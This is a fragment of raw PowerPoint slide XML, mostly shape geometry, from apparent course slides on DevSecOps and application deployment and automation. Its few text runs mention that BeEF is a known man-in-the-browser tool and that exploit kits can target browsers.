                    <a:pt x="29833" y="1669474"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="63313" y="1702954"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="105777" y="1724905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154685" y="1732788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4365498" y="1732788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4414406" y="1724905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4456870" y="1702954"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4490350" y="1669474"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4512301" y="1627010"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4520183" y="1578102"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4520183" y="154686"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4512301" y="105777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4490350" y="63313"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4456870" y="29833"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4414406" y="7882"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4365498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661922" y="4517897"/>
              <a:ext cx="4520565" cy="1732914"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4520565" h="1732914">
                  <a:moveTo>
                    <a:pt x="0" y="154686"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7882" y="105777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29833" y="63313"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="63313" y="29833"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="105777" y="7882"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154685" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4365498" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4414406" y="7882"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4456870" y="29833"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4490350" y="63313"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4512301" y="105777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4520183" y="154686"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4520183" y="1578102"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4512301" y="1627010"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4490350" y="1669474"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4456870" y="1702954"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4414406" y="1724905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4365498" y="1732788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154685" y="1732788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="105777" y="1724905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="63313" y="1702954"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29833" y="1669474"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7882" y="1627010"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1578102"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="154686"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="2857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835023" y="4809845"/>
            <a:ext cx="4039235" cy="1076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000" spc="-90">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-100">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>h</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="10">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-105">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="15">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Browse</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-5">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-135">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-65">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Ex</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-75">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-35">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>loitation  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-25">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Framewor</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-20">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>k</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-130">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="30">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="45">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-25">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>eEF</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-10">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-114">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-70">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-110">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="10">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-125">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-35">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>wel</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-15">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-515">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-35">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>kno</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-55">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>w</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-10">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>n  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="30">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>MitB</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-140">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-55">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>tool.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647634" y="6525958"/>
            <a:ext cx="4549140" cy="1761489"/>
            <a:chOff x="1647634" y="6525958"/>
            <a:chExt cx="4549140" cy="1761489"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="object 17"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1661922" y="6540245"/>
              <a:ext cx="4520565" cy="1732914"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4520565" h="1732915">
                  <a:moveTo>
                    <a:pt x="4365498" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="154685" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="105777" y="7882"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="63313" y="29833"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29833" y="63313"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7882" y="105777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="154685"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1578114"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7882" y="1627002"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29833" y="1669461"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="63313" y="1702944"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="105777" y="1724902"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154685" y="1732788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4365498" y="1732788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4414406" y="1724902"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4456870" y="1702944"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4490350" y="1669461"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4512301" y="1627002"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4520183" y="1578114"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4520183" y="154685"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4512301" y="105777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4490350" y="63313"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4456870" y="29833"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4414406" y="7882"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4365498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661922" y="6540245"/>
              <a:ext cx="4520565" cy="1732914"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4520565" h="1732915">
                  <a:moveTo>
                    <a:pt x="0" y="154685"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7882" y="105777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29833" y="63313"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="63313" y="29833"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="105777" y="7882"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154685" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4365498" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4414406" y="7882"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4456870" y="29833"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4490350" y="63313"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4512301" y="105777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4520183" y="154685"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4520183" y="1578114"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4512301" y="1627002"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4490350" y="1669461"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4456870" y="1702944"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4414406" y="1724902"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4365498" y="1732788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154685" y="1732788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="105777" y="1724902"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="63313" y="1702944"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29833" y="1669461"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7882" y="1627002"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1578114"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="154685"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="2857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1835023" y="6832828"/>
            <a:ext cx="4112260" cy="1077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000" spc="-65">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Ex</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-75">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-55">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>loit</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-120">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-75">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>kits</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-140">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-75">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-10">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-5">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-125">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-15">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>be</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-114">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-85">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-25">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-35">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>st</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-40">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-75">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-85">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-15">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-15">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>d</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-145">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-15">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>on  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-20">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>b</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-25">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-25">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>ows</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-25">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>er</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-20">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-140">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-30">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-40">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-114">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-70">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>ex</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-85">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-55">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>loit</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-135">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-20">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>an</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-15">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>y</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-114">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-30">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>vul</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-55">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-20">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>erable  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-60">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>sites.</a:t>
            </a:r>
            <a:endParaRPr sz="2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3825" y="4258436"/>
            <a:ext cx="83870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45">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Analyze</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-75">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="105">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Deployment</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-60">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="105">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-65">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="120">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Automation</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-3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Concepts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32582" y="306451"/>
            <a:ext cx="998601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55">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Application</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-3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95">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Development,</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-5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95">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Deployment,</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-2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5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dirty="0" spc="-5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20">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Automation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2644" y="760476"/>
            <a:ext cx="13679423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19376" y="1882292"/>
            <a:ext cx="12421870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69590" marR="5080" indent="-3057525">
              <a:lnSpc>
                <a:spcPct val="114999"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pP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DevSecOps,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security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tasks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require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increased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automation.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Automation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completion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an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admi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ive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k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w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thou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ma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v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ention.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04259" y="3215639"/>
            <a:ext cx="9531350" cy="840105"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="9531350" h="840104">
                <a:moveTo>
                  <a:pt x="9391142" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="139953" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="95699" y="7130"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57278" y="26989"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26989" y="57278"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7130" y="95699"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="139954"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="699770"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7130" y="744024"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26989" y="782445"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57278" y="812734"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="95699" y="832593"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="139953" y="839724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9391142" y="839724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9435396" y="832593"/>
                </a:lnTo>
                <a:lnTo>
